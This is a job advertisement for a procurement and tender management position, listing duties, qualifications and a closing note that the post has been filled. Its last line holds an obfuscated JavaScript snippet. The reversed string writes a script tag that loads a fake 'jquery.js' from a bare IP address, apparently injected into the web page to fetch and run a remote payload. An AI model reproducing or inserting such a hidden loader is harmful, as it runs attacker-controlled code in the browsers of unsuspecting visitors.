Location : Menara TM, Bangsar
Industry : Education
General Job Accountabilities:
Responsible for coordinating, planning, controlling, evaluating and monitoring all procurement matters or items including TSIP (Trust School Improvement Plan) and general purchases. Also responsible in managing proposal and tender management
• Purchase Planning & Procurement
– Ensure effective and timely executions of all activities in planning of purchases, procurement including planning, sourcing, negotiating, supplier/service providers’ selection, cost saving and purchasing activities in accordance to policy and work flow.
– Work closely with other units to develop and improve execution of procurement activities including development & improvements of process flow of procurement to ensure it supports Company’s business goals, and ensure adherence and consistency with budget.
– Responsible in sourcing for materials and vendors, coordinate & prepare forecast purchase plan and manage resources/ materials/ assets requirements.
– Responsible to compile and obtain approval for procurement activities.
– Enhance communicate and monitor policies on procurement.
– Ensure compliance of limit of authority and procurement policy.
– Manage cost of purchase, and set targets and activities for cost reduction. Continuously sourcing for products that best serve the company’s interest – high quality at competitive price.
– Establish and improve business relationship with all suppliers based on a high level of professionalism and integrity and good business ethics.
– Prepare, analyze and maintain purchasing result, statistics and supplier performance evaluation for management reports and reviews.
– Maintain an updated and complete list of registered suppliers. To analyze current market trends within their field based on sales or performance data, as well as to forecast future performance and make procurement recommendations accordingly. Therefore, being detail oriented and having the ability to translate raw data into usable information is absolutely mandatory.
– Other tasks and improvements related to procurement.
• Managing Proposal and Tender Management. To establish and adhere to certain procurement guidelines based on the strategies and goals outlined.
– To compose RFIs (Requests for Information), a preliminary tool used to collect information about the strengths and abilities of prospective vendors, or RFPs (Requests for Proposal), which allows a company to invite service or merchandise suppliers to bid on projects or jobs.
– To negotiate the exact terms of the agreement so as to establish clear expectations on the part of both parties.
– Responsible for drafting all contracts between the company and vendors. These contracts will contain all the guidelines and stipulations of businesses agreement, length of contract, expected goods and services, time line for delivery of said goods and services, quality and quantity expectations, and payment terms.
• Other Responsibilities
– Manage effective personnel development as part of the Company’s commitment to invest in staff as the key resource in the organisation.
– Ensure that staffs meet their statutory responsibilities and Company policies with regard to Health and Safety.
– Excellent written and verbal communication skills
– Any other appropriate duties as allocated by the Management.
– To promote and adhere to the Company Vision and Values.
– Commitment to quality, positive attitude, responsibility and enthusiasm.
• Bachelor’s degree in Business, Finance, Accounting or Supply Chain.
• 3-5 years related experience in Procurement with some experience in other industries.
• Computer literate (MS Office applications – Excel, Power Point)
• Experience in using Procurement system
• Systematic and organised filing system (both physical filing and softcopies in server) for all tasks performed.
Congratulations to the well spoken young lady who has secured this position! Thanks to all others who have applied. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))